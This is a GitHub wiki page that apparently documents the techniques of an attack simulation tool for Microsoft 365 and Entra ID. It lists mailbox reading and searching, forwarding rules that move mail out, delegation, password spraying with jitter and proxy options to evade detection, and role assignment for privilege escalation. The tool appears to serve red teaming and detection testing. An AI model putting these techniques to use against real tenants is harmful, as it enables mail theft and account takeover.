Skip to content

Supported Techniques

mvelazco edited this page Dec 17, 2024 · 22 revisions

read_email

  • Supported Methods: Graph, EWS
  • Description: Simulates the action of reading emails from a specified mailbox, demonstrating data access and potential exfiltration capabilities.
  • Execution Context: Operates within the access scope of the authenticated user's mailbox with user credentials; with application credentials and the necessary permissions, it extends to reading emails from any mailbox in the organization.
  • Parameters:
    • session: Defines the authentication context, specifying which user or account the technique will execute under.
    • access_method: Specifies the API method used (Graph API or EWS).
    • mailbox: Target email address from which emails will be read.
    • limit: Maximum number of emails to be read.

search_mailbox

  • Supported Methods: Graph
  • Description: Simulates an adversary conducting targeted searches within a mailbox to uncover sensitive information.
  • Execution Context: This technique operates exclusively within the scope of the authenticated user's mailbox based on provided user credentials. It does not support application authentication.
  • Parameters:
    • session: Defines the authentication context, specifying which user or account the technique will execute under.
    • access_method: Specifies the API method used (Graph API).
    • keyword: Keyword for the search.
    • mailbox: Target email address from which emails will be read.
    • limit: Optional parameter to limit the number of search results returned.

search_onedrive

  • Supported Methods: Graph
  • Description: Simulates an adversary conducting targeted searches within OneDrive and Sharepoint.
  • Execution Context: This technique operates exclusively within the scope of the authenticated user's OneDrive based on provided user credentials. It does not support application authentication.
  • Parameters:
    • session: Defines the authentication context, specifying which user or account the technique will execute under.
    • access_method: "graph" indicates the use of Microsoft Graph API for this simulation.
    • keyword: Keyword for the search.
    • limit: Optional parameter to limit the number of search results returned.

create_rule

  • Supported Methods: Graph, EWS, REST
  • Description: Creates an email rule to automatically forward emails containing specified keywords, simulating discreet information exfiltration.
  • Execution Context: With user credentials, allows for creating email rules within the user's own mailbox; when using application credentials with adequate permissions, rules can be established across any user mailboxes organization-wide.
  • Parameters:
    • session: Defines the authentication context, specifying which user or account the technique will execute under.
    • access_method: Method used for rule creation (Graph, EWS, or REST).
    • mailbox: Email address on which the rule will be created.
    • rule_name: Name of the created rule.
    • forward_to: Email address to which matching emails will be forwarded.
    • body_contains: Keyword that triggers the rule.

enable_email_forwarding

  • Supported Methods: REST
  • Description: Enables automatic forwarding of all emails from a specified mailbox, simulating unauthorized email traffic diversion.
  • Execution Context: Can enable forwarding for the authenticated user's own mailbox with user credentials; with application credentials granted the right permissions, forwarding can be activated for any mailbox.
  • Parameters:
    • session: Defines the authentication context, specifying which user or account the technique will execute under.
    • access_method: This technique uses REST.
    • mailbox: Mailbox from which emails will be forwarded.
    • forward_to: Destination email address for forwarded emails.

add_folder_permission

  • Supported Methods: REST, EWS
  • Description: Grants a user permission to access a specific folder in another user's mailbox, simulating unauthorized access to sensitive information.
  • Execution Context: Grants folder access rights within the user's mailbox using user credentials; application credentials with proper permissions can modify folder permissions across mailboxes organization-wide.
  • Parameters:
    • session: Defines the authentication context, specifying which user or account the technique will execute under.
    • access_method: Specifies REST or EWS.
    • mailbox: Mailbox containing the folder to which permissions will be added.
    • folder: Folder for which permissions are granted.
    • grantee: User being granted folder access.
    • access_rights: Level of access granted (e.g., Owner, Author).

add_mailbox_delegation

  • Supported Methods: REST
  • Description: Grants a user full access to another user's mailbox, critical for simulating compromised account scenarios.
  • Execution Context: Allows mailbox delegation for the authenticated user's mailbox with user credentials; application credentials with sufficient permissions enable delegation setup for any mailbox in the organization.
  • Parameters:
    • session: Defines the authentication context, specifying which user or account the technique will execute under.
    • access_method: Uses REST.
    • mailbox: Mailbox to which access will be delegated.
    • grantee: User granted access to the mailbox.
    • access_rights: Type of access granted, "FullAccess".

run_compliance_search

  • Supported Methods: REST
  • Description: Executes a compliance search for specified keywords, simulating the search for sensitive or regulated information.
  • Execution Context: Requires privileges from either an application with the appropriate permissions or a high-privileged user account with administrative Exchange roles.
  • Parameters:
    • session: Defines the authentication context, specifying which user or account the technique will execute under.
    • access_method: Uses REST.
    • keyword: Keyword for the search.
    • name: Name of the compliance search.

create_mailflow_rule

  • Supported Methods: REST
  • Description: Establishes a mail flow rule to forward emails based on defined criteria, simulating potential malicious redirection.
  • Execution Context: Can only be executed with sufficient privileges, accessible to applications granted the necessary permissions or users endowed with high-level administrative Exchange roles.
  • Parameters:
    • session: Defines the authentication context, specifying which user or account the technique will execute under.
    • access_method: Uses REST.
    • forward_to: Email address for forwarding.
    • name: Name of the mail flow rule.

password_spray

  • Description: Performs a password spray attack by attempting to authenticate multiple user accounts with a single password, simulating a common brute-force technique to identify weak or reused passwords.
  • Execution Context: Does not require an authenticated user and can only target accounts that do not have Multi-Factor Authentication (MFA) enabled.
  • Parameters:
    • user_list: A list of usernames or user email addresses to target.
    • password: The password to attempt across all provided users.
    • sleep: (Optional) Time in seconds to wait between attempts to avoid detection or throttling.
    • jitter: (Optional) Adds random variation to the sleep interval to evade pattern-based detection.
    • user_agent: (Optional) Custom User-Agent string for the HTTP request.
    • proxy: (Optional) HTTP/S proxy to route the requests.

change_user_password

  • Supported Methods: Microsoft Graph API
  • Description: Updates the password of a specified user account, simulating scenarios where an attacker resets or changes a user's password.
  • Execution Context: Requires an authenticated session with sufficient privileges, such as a user with administrative roles or permissions to modify user accounts.
  • Parameters:
    • session: Defines the authentication context, specifying which user or account the technique will execute under.
    • user_id: The unique identifier (ID) or username (UPN) of the target user account.
    • new_password: The new password to set for the target user account.

assign_app_role

  • Supported Methods: Microsoft Graph API
  • Description: Assigns application roles to a specified service principal, simulating scenarios where an attacker grants elevated permissions to applications or service principals.
  • Execution Context: Requires an authenticated session with sufficient privileges to assign roles to service principals.
  • Parameters:
    • session: Defines the authentication context, specifying which user or account the technique will execute under.
    • service_principal_id: The unique identifier (ID) of the target service principal to which the role will be assigned.
    • resource_id: The unique identifier (ID) of the resource (application) containing the app role.
    • app_role_id: The unique identifier (ID) of the app role to assign. Can be a single value or a list of IDs.

assign_entra_role

  • Supported Methods: Microsoft Graph API
  • Description: Assigns an Azure AD (Entra) role to a specified user or service principal, simulating privilege escalation scenarios where elevated permissions are granted.
  • Execution Context: Requires an authenticated session with sufficient privileges, such as Privileged Role Administrator or Global Administrator roles.
  • Parameters:
    • session: Defines the authentication context, specifying which user or account the technique will execute under.
    • user_principal_name: The User Principal Name (UPN) of the target user. (Optional if principal_id is provided).
    • principal_id: The unique identifier (ID) of the user or service principal to assign the role to.
    • role_id: The unique identifier (ID) of the directory role to be assigned.
Clone this wiki locally